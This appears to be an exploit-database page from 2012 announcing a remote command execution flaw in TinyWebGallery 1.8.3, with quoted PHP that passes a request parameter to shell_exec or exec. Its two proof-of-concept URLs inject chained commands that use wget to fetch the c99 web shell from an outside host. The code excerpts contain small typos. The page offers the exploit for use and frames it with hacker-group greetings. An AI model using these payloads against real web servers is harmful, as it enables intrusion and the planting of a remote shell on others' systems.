TinyWebGallery 1.8.3 - Remote Command Execution



EKU-ID: 24104 CVE: OSVDB-82603;OSVDB-82481;CVE-2012-5347 OSVDB-ID:
Author: Expl0!Ts Published: 2012-01-06 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


<======================================================>
[»]  TinyWebGallery 1.8.3 Remote Command Execution
<======================================================>


     [»]  ---> Date :     05- 01- 2012
     [»]  ---> Author :    Expl0!Ts --------> My Best t34m ----->    "BaC , RoBert MilEs , Bl4ck_ID"
     [»]  ---> Software Link :  http://www.tinywebgallery.com/dl.php?file=twg_latest
     [»]  ---> Version:      n/a
     [»]  ---> Category:  php
     [»]  ---> Tested on:  wind xp


        !----- >  THnKs T0 My ALLAH
<::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::>
        bIG tHnkS T0 :-> vbspiders.com & Dz4all.com & isecur1ty.org
<::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::>
<=================Exploit====================>

-=[ vuln c0de ]=- 1


  1)  --------------> filefunctions.inc :


        function execute_command ($command) {
  global $use_shell_exec;
                   ob_start();
     set_error_handler("on_error_no_output");
  i f (substr(@php_uname(), 0, 7) == "Windows"){
    // Make a new instance of the COM object
       $WshShell = new COM("WScript.Shell");
  // Make the command window but dont show it.
    $oExec = $WshShell->Run("cmd /C " . $command, 0, true);
  } else {
      if ($use_shell_exec) {
         shell_exec($command);    <--------------------------------------------- error





 1)  ---------> PoC :


      http://127.0.0.1/(patch)/inc/filefunctions.inc?command=<id>;<pwd>;<wget http://shell.org/c99.zip>




-=[ vuln c0de ]=- 2


  2) --------------> ifo.php :

   if ($use_shell_exec) {

           shell_exec($command);

       } else {

            exec($command . " > /dev/null");  <------------------------------------------ error


  2)  ---------> PoC :

       http://127.0.0.1/(patch)/info.php?command=<id>;<pwd>;<wget http://shell.org/c99.zip>


<------------------------------------------------------------------------------------------------------------------------------------------------------------------->
  Gr33tz :
       !>   BaC ,!>  Black_ID  ,!>  Kala$nikoV ,!>  Robert miles  ,!>  Dr.Black_ID  , !> AHmEd-HaMaImi , Bel-AiSa , To-KhAlEd
<------------------------------------------------------------------------------------------------------------------------------------------------------------------->


EnJoY o_O